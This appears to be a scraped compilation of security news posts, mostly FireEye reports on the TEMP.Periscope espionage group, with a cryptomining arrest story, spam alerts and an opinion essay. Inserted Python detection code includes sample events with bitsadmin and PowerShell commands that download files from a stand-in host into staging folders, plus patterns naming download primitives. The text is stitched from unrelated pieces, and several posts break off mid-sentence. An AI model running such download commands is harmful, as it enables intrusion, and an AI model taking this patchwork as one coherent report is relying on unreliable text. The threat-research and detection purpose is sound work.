The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Redirect Site (Not Malicious) | AIRBREAK Downloader
(not recovered) | TOP_NEWS_Japan_to_Support_the_Election.js (3c51c89078139337c2c92e084bb0904c) [Figure 4]
(not recovered) | Philippines-draws-three-hard-new-lines-on-china .js

Table 1: AIRBREAK downloaders (only two rows survived extraction; the redirect-site column did not)

Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.

Figure 5: SCANBOX welcome page

Copied Article Topic | Article Source (Not Compromised)
Leaders confident yet nervous | Khmer Times
Mahathir_ 'We want to be friendly with China | Khmer Times
PM urges voters to support CPP for peace | Khmer Times
CPP determined to maintain Kingdom's peace and development | Khmer Times
Bun Chhay's wife dies at 60 | Khmer Times
Crackdown planned on boycott callers | Khmer Times
Further floods coming to Kingdom | Khmer Times
Kem Sokha again denied bail | Khmer Times
PM vows to stay on as premier to quash traitors | Khmer Times
Iran_ Don't trust Trump | Fresh News
Kim-Trump summit_ Singapore's role | Fresh News
Trump's North Korea summit may bring peace declaration - but at a cost | Fresh News
U.S. pushes NATO to ready more forces to deter Russian threat | Fresh News
Interior Minister Sar Kheng warns of dirty tricks | Phnom Penh Post
Another player to enter market for cashless pay | Phnom Penh Post
Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America | ABC News
China-funded national road inaugurated in Cambodia | The Cambodia Daily
Kim and Trump in first summit session in Singapore | Asia Times
U.S. to suspend military exercises with South Korea, Trump says | U.S. News
Rainsy defamed the King_ Hun Sen | Associated Press

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).

EVILTECH:
  • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
  • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.

DADBOD (Credential Theft):
  • DADBOD is a tool used to steal user cookies.
  • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of the IP addresses,, is located in Hainan, China. Other addresses belong to virtual private servers, but artifacts indicate that the computers used to log in were, in all cases, configured with Chinese language settings.

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised – simply gathering intelligence or as part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

Chinese arrest 20 in major Crypto Currency Mining scam

According to the Chinese-language publication Legal Daily, police in two districts of China have arrested 20 people for their roles in a major crypto currency mining operation that earned the criminals more than 15 million yuan (currently about $2M USD).

The hackers installed mining software developed by Dalian Yuping Network Technology Company (大连昇平网络科技有限) that was designed to steal three types of coins: Digibyte Coins (DGB, currently valued at USD$0.03 each), Siacoin (SC, currently valued at $0.01 each) and DeCred coins (DCR coins, currently valued at $59.59 each).

It is believed that these currencies were chosen for the dual reason that they are easier to mine, due to less competition, and that they are less likely to be the target of sophisticated blockchain analysis tools.

The Game Cheat Hacker

The investigation began when Tencent detected the presence of a hidden Trojan horse with silent mining capabilities built into a cheat for a popular first person shooter video game. The plug-in provided a variety of cheats for the game, including "automatic aiming", "bullet acceleration", "bullet tracking" and "item display."  
Tencent referred the case to the Wei'an Municipal Public Security Bureau, who handled the case extremely well.  As they learned more about the trojans, they identified first the social media groups and forums where the trojan was being spread, and traced the identity of the person uploading the trojaned game cheat to a criminal named Yang Mobao. Mobao participated as a forum moderator on a site called the "Tianxia Internet Bar Forum" and members who received the cheat from him there widely shared it in other forums and social media sites, including many file shares on Baidu.
Mobao was popularizing the cheat program by encouraging others to make suggestions for new functionality.  The users who were using the tool did not suspect that they were actually mining crypto-currency while using the cheat.  More than 30,000 victims were using his cheat software and secretly mining crypto-currency for him.
Yang Mobao had a strong relationship with gamers from his business of selling gaming video cards to Internet cafes. He installed at least 5,774 cards in at least 2,465 Internet cafes across the country, preloading the firmware on the cards to perform mining. It turns out that these cards ALSO were trojaned! As a major customer of Dalian Yuping, Mobao was offered a split of the mining proceeds from the cards he installed, earning him more than 268,000 yuan.
Yang is described as a self-taught computer programmer who had previously worked managing Internet cafes. After experiencing some profit from the scheme above, he modified the malware embedded in some of the video cards and installed his own miner, mining the HSR coin and transferring the proceeds to a wallet he controlled.

The Video Card Maker

After Yang Mobao confessed to his crimes, the cybercrime task force sent 50 agents to Dalian, in Liaoning Province. The Task Force learned that Dalian Yuping Network Technology had been approached by advertisers, who paid them to embed advertising software on their video cards, which were then installed in 3.89 million computers, mostly high-end gaming systems installed in video cafes. The company's owner, He Mou, and the company's Financial Controller, his wife Chen Mou, had instructed the company's head of R&D, Zhang Ning, to investigate mining software and to experiment with various mining trojans. In addition to the illegal advertising software embedded in those 3.89 million video cards, their crypto currency mining software was embedded into 1 million additional video cards which were sold and deployed in Internet cafes across the country.
Each time one of those machines successfully mined a coin, the coin was transferred to a wallet owned by He Mou. Chen Mou could then cash them out at any time in the future.
16 suspects at the company were interrogated and 12 criminally detained for the crime of illegally controlling computer information systems. Zhao was sentenced to four years himself.
(I learned of this story from CoinDesk's Wolfie Zhao, and followed up on it from the Legal Daily story he links to as well as a report in Xinhuanet, by Reporter Xy Peng and correspondent Liu Guizeng Wang Yen.) (记者 徐鹏 通讯员 刘贵增 王艳)

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.

The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:

  • AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor-controlled profiles on legitimate services.
  • BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
  • PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
  • HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with the AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR 0x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and the malware version for each login session.
  • LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
  • MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.
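HOMEFRY's XOR-0x56 string obfuscation is the kind of detail an analyst turns into a triage check. The following is an added example, not FireEye's code and not HOMEFRY's: a generic single-byte-XOR string scanner that decodes a buffer with a candidate key and reports printable runs with their offsets, the way `strings` would on an unobfuscated binary, plus a brute-force pass for when the key is not yet known (a generalisation beyond the 0x56 key named above). The sample blob is constructed for the demo; the marker strings in it are not HOMEFRY strings.

```python
"""Single-byte-XOR string recovery for malware triage (added example)."""
import re


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; XOR is its own inverse."""
    return bytes(b ^ key for b in data)


def find_xor_strings(data: bytes, key: int = 0x56, min_len: int = 6):
    """Decode `data` with `key` and return (offset, text) for every
    printable-ASCII run of at least `min_len` characters."""
    decoded = xor_bytes(data, key)
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [(m.start(), m.group().decode("ascii"))
            for m in re.finditer(pattern, decoded)]


def brute_force_key(data: bytes, markers, min_len: int = 6):
    """Try all 256 single-byte keys and return those under which every
    expected marker substring appears in some recovered string."""
    hits = []
    for key in range(256):
        found = [s for _, s in find_xor_strings(data, key, min_len)]
        if all(any(m in s for s in found) for m in markers):
            hits.append(key)
    return hits


# Constructed sample blob: two plaintext strings XORed with 0x56, separated
# by filler bytes chosen so that they decode to non-printable values
# (0x56 ^ 0x56 = 0x00, 0xd6 ^ 0x56 = 0x80).
FILLER = b"\x56\x56\xd6\x56"
SAMPLE_BLOB = (FILLER
               + xor_bytes(b"constructed-marker-one", 0x56)
               + FILLER
               + xor_bytes(b"constructed\\path\\example.dll", 0x56)
               + FILLER)

if __name__ == "__main__":
    for offset, text in find_xor_strings(SAMPLE_BLOB):
        print(f"0x{offset:04x}: {text}")
    print("candidate keys:", brute_force_key(SAMPLE_BLOB, ["marker-one"]))
```

In practice the recovered strings (and the key) become the basis for a YARA rule or a sandbox signature; the brute-force helper is only useful when a marker you expect to see (a known C2 hostname, a known command string) is available to test against.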

The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:

  • Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
  • BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as GitHub and Microsoft's TechNet portal. Used by APT17 and other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including the use of probably compromised email accounts.
  • Lure documents using CVE-2017-11882 to drop malware.
  • Stolen code signing certificates used to sign malware.
  • Use of bitsadmin.exe to download additional tools.
  • Use of PowerShell to download additional tools.
  • Using C:\Windows\Debug and C:\Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
  • Using Windows Management Instrumentation (WMI) for persistence.
  • Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a JScript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as GitHub and Microsoft's TechNet portal.

The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.
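Several of the TTPs in the list above (bitsadmin.exe and PowerShell downloads, the C:\Windows\Debug and C:\Perflogs staging directories, .lnk files in the Startup folder invoking wscript.exe, and WMI persistence) map directly onto host telemetry. The following is an added example, not FireEye's code: detection logic for those TTPs run over constructed Sysmon-style events. The JSON-lines format and its field names (type, image, cmdline, parent_image, target, consumer_type) are this example's own simplification; map them onto whatever your endpoint sensor emits. The paths, hostnames and command lines in the sample events are constructed.

```python
"""Host-telemetry rules for the TEMP.Periscope TTPs listed above (added example)."""
import json
import re
from pathlib import PureWindowsPath

# Staging directories named in the write-up (matched case-insensitively).
STAGING_DIRS = ("c:\\windows\\debug\\", "c:\\perflogs\\")
STARTUP_FRAGMENT = "\\start menu\\programs\\startup\\"
# Common PowerShell download primitives; a heuristic, not an exhaustive list.
PS_DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biwr\b", re.I)
URL = re.compile(r"https?://", re.I)
JSCRIPT_ARG = re.compile(r'\.jse?("|\s|$)', re.I)


def classify(event: dict) -> list:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits = []
    kind = event.get("type")
    image = event.get("image", "").lower()
    cmd = event.get("cmdline", "").lower()
    parent = PureWindowsPath(event.get("parent_image", "")).name.lower()
    exe = PureWindowsPath(image).name
    if kind == "process_create":
        if exe == "bitsadmin.exe" and URL.search(cmd):
            hits.append("bitsadmin_download")
        if exe in ("powershell.exe", "pwsh.exe") and PS_DOWNLOAD.search(cmd):
            hits.append("powershell_download")
        if any(d in image or d in cmd for d in STAGING_DIRS):
            hits.append("staging_dir_use")
        # wscript.exe spawned by explorer.exe with a .js/.jse argument is what a
        # Startup-folder .lnk running a JScript backdoor looks like at logon.
        if exe == "wscript.exe" and parent == "explorer.exe" and JSCRIPT_ARG.search(cmd):
            hits.append("wscript_jscript_from_logon")
    elif kind == "file_create":
        target = event.get("target", "").lower()
        if STARTUP_FRAGMENT in target and target.endswith(".lnk"):
            hits.append("startup_lnk_created")
    elif kind == "wmi_consumer":
        # Permanent WMI event consumers that run commands or scripts are the
        # persistence primitive; legitimate management tooling also creates them.
        consumer = event.get("consumer_type", "").lower()
        if consumer in ("commandlineeventconsumer", "activescripteventconsumer"):
            hits.append("wmi_event_consumer")
    return hits


def scan(lines):
    """Parse JSON-lines telemetry; return [(line_no, hits)] for flagged events."""
    findings = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        hits = classify(json.loads(line))
        if hits:
            findings.append((n, hits))
    return findings


# Constructed sample events: one benign process start followed by one
# event per TTP. Hostnames use the reserved .invalid TLD.
SAMPLE_LINES = r'''
{"type": "process_create", "image": "C:\\Windows\\notepad.exe", "cmdline": "notepad.exe notes.txt", "parent_image": "C:\\Windows\\explorer.exe"}
{"type": "process_create", "image": "C:\\Windows\\System32\\bitsadmin.exe", "cmdline": "bitsadmin.exe /transfer job http://updates.example.invalid/t.bin C:\\Perflogs\\t.bin", "parent_image": "C:\\Windows\\System32\\cmd.exe"}
{"type": "process_create", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -NoProfile Invoke-WebRequest http://updates.example.invalid/a -OutFile C:\\Windows\\Debug\\a.dat", "parent_image": "C:\\Windows\\System32\\cmd.exe"}
{"type": "process_create", "image": "C:\\Windows\\System32\\wscript.exe", "cmdline": "\"C:\\Windows\\System32\\wscript.exe\" C:\\Users\\u\\AppData\\Roaming\\svc.js", "parent_image": "C:\\Windows\\explorer.exe"}
{"type": "file_create", "image": "C:\\Windows\\System32\\wscript.exe", "target": "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svc.lnk"}
{"type": "wmi_consumer", "name": "constructed_consumer", "consumer_type": "CommandLineEventConsumer"}
'''.strip().splitlines()

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_LINES):
        print(f"line {line_no}: {', '.join(hits)}")
```

Each rule is deliberately narrow so that a hit is worth an analyst's time; the staging-directory and WMI-consumer rules will also fire on legitimate administration and need an allow-list for your environment. Note that the spear-phishing, stolen-certificate and VPS/VPN-exit-node TTPs in the list are not host-observable in this way and need mail, PKI and network telemetry instead.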

As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.

Indicators

HOMEFRY, a 64-bit Windows password dumper/cracker

MURKYTOP, a command-line reconnaissance tool

AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

Historical Indicators

AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

Beacon, a commercially available backdoor

PHOTO, also reported as Derusbi

BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration

Multiple badness on /

Two massive fake "Bill" spam runs seem to be under way, one claiming to be from BT and the other being more generic.

Subject: New BT Bill
From: "BT Business" []
Date: Thu, August 24, 2017 6:08 pm
Priority: Normal

From BT
New BT Bill
Your bill amount is: $106.84
This doesn't include any amounts brought forward from any other bills.
We've put your latest

Malware spam: "Voice Message Attached from 0xxxxxxxxxxx – name unavailable"

This fake voice mail message leads to malware. It comes in two slightly different versions, one with a RAR file download and the other with a ZIP.

Subject: Voice Message Attached from 001396445685 - name unavailable
From: "Voice Message"
Date: Wed, August 23, 2017 10:22 am

Time: Wed, 23 Aug 2017 14:52:12 +0530
Download

Cerber spam: "please print", "images etc"

I only have a couple of samples of this spam, but I suspect it comes in many different flavours.

Subject: images
From: "Sophia Passmore" [Sophia5555@victimdomain.tld]
Date: Fri, May 12, 2017 7:18 pm

--
*Sophia Passmore*

Subject: please print
From: "Roberta Pethick" [Roberta5555@victimdomain.tld]
Date: Fri, May 12, 2017 7:18 pm

--
*Roberta Pethick*

In these two

Five Reasons I Want China Running Its Own Software

Periodically I read about efforts by China, or Russia, or North Korea, or other countries to replace American software with indigenous or semi-indigenous alternatives. I then reply via Twitter that I love the idea, with a short reason why. This post will list the top five reasons why I want China and other likely targets of American foreign intelligence collection to run their own software.

1. Many (most?) non-US software companies write lousy code. The US is by no means perfect, but our developers and processes generally appear to be superior to foreign indigenous efforts. Cisco vs Huawei is a good example. Cisco has plenty of problems, but it has processes in place to manage them, plus secure code development practices. Lousy indigenous code means it is easier for American intelligence agencies to penetrate foreign targets. (An example of a foreign country that excels in writing code is Israel, but thankfully it is not the same sort of priority target like China, Russia, or North Korea.)

2. Many (most?) non-US enterprises are 5-10 years behind US security practices. Even if a foreign target runs decent native code, the IT processes maintaining that code are lagging compared to American counterparts. Again, the US has not solved this problem by any stretch of the imagination. However, relatively speaking, American inventory management, patch management, and security operations have the edge over foreign intelligence targets. Because non-US enterprises running indigenous code will not necessarily be able to benefit from American expertise (as they might if they were running American code), these deficiencies will make them easier targets for foreign exploitation.

3. Foreign targets running foreign code is a win-win for American intel and enterprises. The current vulnerability equities process (VEP) puts American intelligence agencies in a quandary. The IC develops a zero-day exploit for a vulnerability, say for use against Cisco routers. American and Chinese organizations use Cisco routers. Should the IC sit on the vulnerability in order to maintain access to foreign targets, or should it release the vulnerability to Cisco to enable patching and thereby protect American and foreign systems?

This dilemma disappears in a world where foreign targets run indigenous software. If the IC identifies a vulnerability in Cisco software, and the majority of its targets run non-Cisco software, then the IC is more likely (or should be pushed to be more likely) to assist with patching the vulnerable software. Meanwhile, the IC continues to exploit Huawei or other products at its leisure.

4. Writing and running indigenous code is the fastest way to improve. When foreign countries essentially outsource their IT to vendors, they become program managers. They lose or never develop any ability to write and run quality software. Writing and running your own code will enroll foreign organizations in the security school of hard knocks. American intel will have a field day for 3-5 years against these targets, as they flail around in a perpetual state of compromise. However, if they devote the proper native resources and attention, they will learn from their mistakes. They will write and run better software. Now, this means they will become harder targets for American intel, but American intel will retain the advantage of point 3.

5. Trustworthy indigenous code will promote international stability. Countries like China feel especially vulnerable to American exploitation. They have every reason to be scared. They run code written by other organizations. They don't patch it or manage it well. Their security operations stink. The American intel community could initiate a complete moratorium on hacking China, and the Chinese would still be ravaged by other countries or criminal hackers, all the while likely blaming American intel. They would not be able to assess the situation. This makes for a very unstable situation.

Therefore, countries like China and others are going down the indigenous software path. They understand that software, not oil as Daniel Yergin once wrote, is now the "commanding heights" of the economy. Pursuing this course will subject these countries to many years of pain. However, in the end I believe it will yield a more stable situation. These countries should begin to perceive that they are less vulnerable. They will experience their own vulnerability equity process. They will be more aware and less paranoid.

In this respect, indigenous software is a win for global politics. The losers, of course, are global software companies. Foreign countries will continue to make short-term deals to suck intellectual property and expertise from American software companies, before discarding them on the side of Al Gore's information highway.

One final point -- a way foreign companies could jump-start their indigenous efforts would be to leverage open source software. I doubt they would necessarily honor licenses which require sharing improvements with the open source community. However, open source would give foreign organizations the visibility they need and access to expertise that they lack. Microsoft's shared source and similar programs were a step in this direction, but I suggest foreign organizations adopt open source instead.

Now, widespread open source adoption by foreign intelligence targets would erode the advantages for American intel that I explained in point 3. I'm betting that foreign leaders are likely similar to Americans in that they tend to not trust open source, and prefer to roll their own and hold vendors accountable. Therefore I'm not that worried, from an American intel perspective, about point 3 being vastly eroded by widespread foreign open source adoption.

TeePublic is running a sale until midnight ET Thursday! Get a TaoSecurity Milnet T-shirt for yourself and a friend!

FBI indicts five members of the Chinese military for hacking US companies

Eric Holder yesterday announced: “Today, we are announcing an indictment against five officers of the Chinese People’s Liberation Army for serious cybersecurity breaches against six American victim entities.” The five officers are known by the aliases UglyGorilla, Jack Sun, Lao Wen, hzy_1hx and KandyGoo. They are members of the PLA’s military unit 61398 (you may […]

The U.S. Electrical Grid More Vulnerable Than Ever

The U.S. electrical grid is more vulnerable today than it has ever been. Cyber attacks have the potential to disrupt large segments of the electrical grid, and top experts confirm that the U.S. is not prepared for this risk. Watch the 60 Minutes Video.

The post The U.S. Electrical Grid More Vulnerable Than Ever appeared first on Quick Start Survival.